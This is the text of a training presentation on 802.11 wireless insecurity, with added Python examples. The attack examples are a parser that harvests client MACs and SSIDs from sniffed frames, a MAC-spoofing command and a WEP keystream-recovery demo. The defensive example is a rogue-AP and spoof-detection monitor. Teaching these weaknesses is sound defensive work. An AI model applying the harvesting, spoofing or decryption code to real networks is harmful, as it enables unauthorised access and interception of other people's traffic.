Demonstration of Wireless Insecurities
Presented by: Jason Wylie, CISM, CISSP
Demonstration of Wireless Insecurities
Agenda:
• Demonstrate the ease of access to an unprotected WLAN
• Set up the 802.11 standard security roll-out (SSID and MAC restrictions)
• Demonstrate the ability to locate an AP and spoof MAC addresses
• Set up WEP on the AP and demonstrate WEP weaknesses
• Discuss methods of providing security over wireless
Equipment / Tools
• Linksys Access Point
• Laptop with Linksys PCMCIA WLAN cards
• Unauthorized “hacker” client system
• NetStumbler, SMAC, WEPCrack, and Ethereal
• Web server (the target)
Rogue (unprotected) Access Point
• No security measures in place
• Access point advertises its SSID
• Casual users can browse your network
• Typical of departmental or “personal” access points
• An intruder starts with internal access to your network
Baseline 802.11 Wireless Security
• Disabling SSID broadcast (SSID: Service Set Identifier)
• MAC restrictions: limit participation to allowed MAC addresses only
• WEP (Wired Equivalent Privacy)
Baseline 802.11 Wireless Security ~ Disabling SSID Broadcast ~
ADDED SECURITY:
• The SSID is no longer announced in the AP's beacons to unknown clients.
CONS:
• Requires manual input of the SSID on all client systems.
• The SSID is still sent in plain text from the client to the AP (in probe requests and association requests), so this is obscurity, not secrecy.
Getting past SSID Obscurity
• Sniff traffic on the WLAN
• Identify the SSID sent by an employee's system while it associates with the AP
• Configure the wireless card with the discovered SSID
Baseline 802.11 Wireless Security ~ MAC Filtering ~
ADDED SECURITY:
• WLAN association is refused to unknown MAC addresses.
CONS:
• Requires manual input of every client system's MAC address into the AP.
• MAC addresses appear unencrypted in every frame, and “spoofing” one is a trivial task.
Getting past MAC Filtering
• Sniff traffic on the WLAN
• Identify valid MAC addresses from employee WLAN traffic (the source address is in the clear in every frame, even when WEP is enabled)
• Spoof the MAC address of the employee's system
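The two “getting past” steps above come down to the same passive capture: read the 802.11 management frames a client sends and pull out the SSID and the client's MAC. The parser below is an added example written for this page, not a tool from the presentation; it walks the fixed 24-byte management header and the tagged parameters of beacon, probe-request and association-request frames. The MAC addresses, the SSID “corp-wlan” and the sample frames are constructed here, not captured traffic.

```python
import struct

# IEEE 802.11 management-frame subtypes (frame type 0)
ASSOC_REQ, PROBE_REQ, BEACON = 0x0, 0x4, 0x8
SSID_ELEMENT_ID = 0
# Fixed-length fields that precede the tagged parameters in each frame body
FIXED_BODY_LEN = {ASSOC_REQ: 4, PROBE_REQ: 0, BEACON: 12}
MAC_HEADER_LEN = 24  # FC(2) + Duration(2) + Addr1/2/3(18) + SeqCtl(2)


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_frame(frame):
    """Parse a raw 802.11 management frame into (subtype, sa, bssid, ssid).

    ssid is None when the frame carries no SSID element and '' when the
    element is present but empty (a 'hidden' SSID beacon).
    Returns None for data/control frames and unsupported subtypes.
    """
    if len(frame) < MAC_HEADER_LEN:
        return None
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    if ftype != 0 or subtype not in FIXED_BODY_LEN:
        return None
    sa, bssid = frame[10:16], frame[16:22]          # Address 2 and Address 3
    offset = MAC_HEADER_LEN + FIXED_BODY_LEN[subtype]
    ssid = None
    while offset + 2 <= len(frame):                 # walk the tagged parameters
        eid, elen = frame[offset], frame[offset + 1]
        data = frame[offset + 2:offset + 2 + elen]
        if len(data) < elen:                        # truncated element, stop
            break
        if eid == SSID_ELEMENT_ID:
            ssid = data.decode("utf-8", "replace")
            break
        offset += 2 + elen
    return subtype, mac_str(sa), mac_str(bssid), ssid


def harvest(frames):
    """Return {client MAC: SSID} from client frames plus the set of hidden-SSID BSSIDs."""
    clients, hidden_aps = {}, set()
    for frame in frames:
        parsed = parse_mgmt_frame(frame)
        if parsed is None:
            continue
        subtype, sa, bssid, ssid = parsed
        if subtype == BEACON and ssid == "":
            hidden_aps.add(bssid)
        elif subtype in (PROBE_REQ, ASSOC_REQ) and ssid:
            clients[sa] = ssid                      # SSID and MAC, both in the clear
    return clients, hidden_aps


# --- constructed sample capture (not real traffic) ---------------------------
def build_mgmt(subtype, addr1, addr2, addr3, fixed, ssid):
    fc = bytes([subtype << 4, 0])                   # type 0 (management), no flags
    header = fc + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00"
    ssid_ie = bytes([SSID_ELEMENT_ID, len(ssid)]) + ssid
    return header + fixed + ssid_ie


BCAST = b"\xff" * 6
AP = bytes.fromhex("00123f000001")        # hypothetical AP / BSSID
CLIENT_A = bytes.fromhex("000c41aa0001")  # hypothetical employee laptops
CLIENT_B = bytes.fromhex("000c41aa0002")

SAMPLE_FRAMES = [
    # AP beacon with SSID broadcast disabled: the element is present but empty
    build_mgmt(BEACON, BCAST, AP, AP, b"\x00" * 12, b""),
    # client A probes for the network by name (directed probe request)
    build_mgmt(PROBE_REQ, BCAST, CLIENT_A, BCAST, b"", b"corp-wlan"),
    # client B associates: the association request repeats the SSID in the clear
    build_mgmt(ASSOC_REQ, AP, CLIENT_B, AP, b"\x31\x04\x0a\x00", b"corp-wlan"),
    # a data frame (type 2) is ignored by the parser
    bytes([0x08, 0x01]) + b"\x00" * 22 + b"\xaa\xaa\x03",
]

if __name__ == "__main__":
    clients, hidden = harvest(SAMPLE_FRAMES)
    for mac, ssid in clients.items():
        print(f"client {mac} uses SSID {ssid!r}")
    print("hidden-SSID APs:", sorted(hidden))
```

Each harvested pair is everything the intruder needs for the next two slides: the SSID goes into the wireless card's configuration, and the client MAC is what SMAC (or, on Linux, `ip link set dev wlan0 address <mac>`) is set to before associating.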
Baseline 802.11 Wireless Security ~ WEP Encryption ~
ADDED SECURITY:
• Traffic is encrypted during transmission.
CONS:
• Requires distribution of one shared WEP key to all employees (and re-keying everyone whenever it leaks or someone leaves).
• WEP keys can be recovered from passively captured traffic.
Getting past WEP
• Sniff traffic on the WLAN
• Gather at least 500MB of traffic (the 2001 FMS attack that WEPCrack implements needs on the order of millions of frames; the 2007 PTW attack needs only tens of thousands)
• Process the capture through WEPCrack
• The keys to the kingdom are revealed
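WEPCrack's key recovery (the FMS statistical attack) needs a large capture; the design flaw underneath it is cheaper to show. WEP builds each packet's RC4 key as a 24-bit cleartext IV followed by the shared key, so two frames sent with the same IV share a keystream, and one known plaintext then decrypts the other without the key. The code below is an added example for this page, not WEPCrack or any other tool from the presentation; the key, the IV and both plaintexts are constructed here. The birthday-bound function shows why 500MB is generous: with only 2^24 IVs, a repeat is more likely than not after about five thousand frames.

```python
import math
import struct
import zlib


def rc4_keystream(key, length):
    """Plain RC4: key schedule, then `length` bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext):
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(shared_key, iv, plaintext):
    """Frame body = IV (3 bytes) || key-id byte || RC4_{IV||key}(plaintext || ICV)."""
    payload = plaintext + icv(plaintext)
    keystream = rc4_keystream(iv + shared_key, len(payload))
    return iv + b"\x00" + xor(payload, keystream)


def wep_decrypt(shared_key, body):
    """Legitimate receiver: rebuild the per-packet key from the cleartext IV."""
    iv, ciphertext = body[:3], body[4:]
    payload = xor(ciphertext, rc4_keystream(iv + shared_key, len(ciphertext)))
    plaintext, tag = payload[:-4], payload[-4:]
    return plaintext, tag == icv(plaintext)


def recover_keystream(body, known_plaintext):
    """Attacker with one known plaintext for this IV: keystream = C xor (P || ICV)."""
    return xor(body[4:], known_plaintext + icv(known_plaintext))


def decrypt_with_keystream(body, keystream):
    """Attacker decrypts any other frame that reused the IV, without the key."""
    ciphertext = body[4:]
    if len(ciphertext) > len(keystream):
        raise ValueError("frame longer than the recovered keystream")
    return xor(ciphertext, keystream)[:-4]


def iv_reuse_probability(frames, iv_bits=24):
    """Birthday bound: probability that some IV repeats among `frames` random IVs."""
    return 1 - math.exp(-frames * (frames - 1) / (2 * 2 ** iv_bits))


# --- constructed demonstration (not a real capture) --------------------------
SHARED_KEY = b"Secret-WEP-13"   # hypothetical 104-bit (13-byte) key, never seen by the attacker
IV = b"\x11\x22\x33"            # 24-bit IV, sent in the clear, reused below
KNOWN = b"ARP request whose contents the attacker knows (e.g. injected from the wired side)"
SECRET = b"password=hunter2"    # hypothetical secret in a later frame

FRAME_KNOWN = wep_encrypt(SHARED_KEY, IV, KNOWN)
FRAME_SECRET = wep_encrypt(SHARED_KEY, IV, SECRET)   # same IV + same key = same keystream


def attack():
    keystream = recover_keystream(FRAME_KNOWN, KNOWN)
    return decrypt_with_keystream(FRAME_SECRET, keystream)


if __name__ == "__main__":
    print("recovered without the key:", attack())
    print(f"IV reuse after 5000 frames: {iv_reuse_probability(5000):.0%}")
```

The recovered keystream is only as long as the known frame, so the attacker decrypts other frames up to that length; longer frames need a longer known plaintext for the same IV. Nothing here depends on the key size: a 104-bit key has exactly the same 24-bit IV problem as a 40-bit one.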
Alternatives
• Limit the broadcast range of access points
• Put the access points outside the firewall (treat the WLAN as untrusted, like the Internet)
• Use strong authentication
• Encrypt traffic with an IPsec VPN (3DES or AES)
• Use proprietary key-rotation methods
• EAP (LEAP – Cisco, EAP-TLS, EAP-TTLS); note that LEAP relies on MS-CHAP exchanges that are open to offline dictionary attacks, so the certificate-based EAP-TLS is the stronger choice
• Manually scan for “rogue” access points
• Install an IDS for WLANs
  • Detects MAC spoofing
  • Identifies “rogue” access points
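The last alternative, a WLAN IDS, is the only one on the list that catches the attacks demonstrated earlier rather than preventing them. The monitor below is an added example written for this page, not a product from the presentation, and it works on already-decoded frames (a real sensor would fill these fields from a monitor-mode capture). Rogue detection compares every beacon's BSSID with an authorized list and separately flags an unknown AP advertising one of our own SSIDs. MAC-spoof detection uses the 802.11 sequence-control field: a NIC increments its 12-bit counter by one per new frame, so two radios sharing one MAC produce a stream that jumps back and forth. The authorized list, the MAC addresses and the frame stream are all constructed for the example.

```python
# Authorized infrastructure (constructed for this example): BSSID -> SSID
AUTHORIZED_APS = {"00:12:3f:00:00:01": "corp-wlan"}
SEQ_MODULUS = 4096      # the 802.11 sequence number is a 12-bit counter
MAX_SEQ_GAP = 64        # forward jumps above this (and any backward jump) are suspicious


def seq_gap(prev, cur):
    """Forward distance between two sequence numbers, wrapping at 4096."""
    return (cur - prev) % SEQ_MODULUS


class WlanMonitor:
    """Minimal WLAN IDS over decoded frames.

    Each frame is a dict: kind ('beacon' or 'data'), src, bssid, seq,
    and for beacons ssid.
    """

    def __init__(self, authorized):
        self.authorized = authorized
        self.last_seq = {}      # src MAC -> last sequence number seen
        self.alerts = []        # (kind, subject, detail) tuples

    def observe(self, frame):
        if frame["kind"] == "beacon":
            self._check_beacon(frame)
        self._check_sequence(frame)

    def _check_beacon(self, frame):
        bssid, ssid = frame["bssid"], frame["ssid"]
        if bssid in self.authorized:
            return
        if ssid in self.authorized.values():
            # an unknown AP advertising our SSID: impersonation, not a stray AP
            self.alerts.append(("evil-twin", bssid, ssid))
        else:
            self.alerts.append(("rogue-ap", bssid, ssid))

    def _check_sequence(self, frame):
        # Retransmissions repeat the previous number (gap 0) and are not flagged;
        # a second radio using the same MAC has its own counter, so the gap is large.
        src, seq = frame["src"], frame["seq"]
        prev = self.last_seq.get(src)
        if prev is not None and seq_gap(prev, seq) > MAX_SEQ_GAP:
            self.alerts.append(("mac-spoof", src, f"seq {prev}->{seq}"))
        self.last_seq[src] = seq


def detect(frames, authorized=AUTHORIZED_APS):
    monitor = WlanMonitor(authorized)
    for frame in frames:
        monitor.observe(frame)
    return monitor.alerts


# --- constructed frame stream (not real traffic) -----------------------------
AP, TWIN, HOMEAP = "00:12:3f:00:00:01", "00:0c:41:ee:ee:ee", "00:06:25:aa:aa:aa"
CLIENT = "00:0c:41:aa:00:01"


def beacon(src, seq, ssid):
    return {"kind": "beacon", "src": src, "bssid": src, "seq": seq, "ssid": ssid}


def data(src, bssid, seq):
    return {"kind": "data", "src": src, "bssid": bssid, "seq": seq}


SAMPLE_FRAMES = [
    beacon(AP, 10, "corp-wlan"),
    beacon(AP, 11, "corp-wlan"),
    beacon(TWIN, 500, "corp-wlan"),      # unknown BSSID advertising our SSID
    beacon(HOMEAP, 77, "linksys"),       # someone's departmental "personal" AP
    data(CLIENT, AP, 100),
    data(CLIENT, AP, 101),
    data(CLIENT, AP, 7),                 # attacker's NIC with the spoofed MAC, own counter
    data(CLIENT, AP, 102),               # the real client continues its counter
]

if __name__ == "__main__":
    for kind, subject, detail in detect(SAMPLE_FRAMES):
        print(f"{kind:10} {subject} {detail}")
```

The sequence heuristic fires twice in the sample because the two radios interleave; tune MAX_SEQ_GAP to the loss rate of the site, since a long burst of frames the sensor missed looks like a forward jump too. Matching on BSSID alone would miss the evil twin, which is why the SSID is checked as well.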
Extensible Authentication Protocol (RFC 2284; since superseded by RFC 3748)
• Provides a flexible link-layer security framework
• Simple encapsulation protocol
  • No dependency on IP
  • ACK/NAK, no windowing
  • No fragmentation support
• Few link-layer assumptions
  • Can run over any link layer (PPP, 802, etc.)
  • Does not assume a physically secure link
  • Assumes no re-ordering
  • Can run over lossy or lossless media
  • Retransmission is the responsibility of the authenticator (not needed for 802.1X or 802.11)
URLs for More Information
• IEEE 802 web page: http://grouper.ieee.org/groups/802/dots.html
• IETF web page: http://www.ietf.org/
• The “Unofficial 802.11 Security” web site: http://www.drizzle.com/~aboba/IEEE/
• 802.11 Planet: http://www.80211-planet.com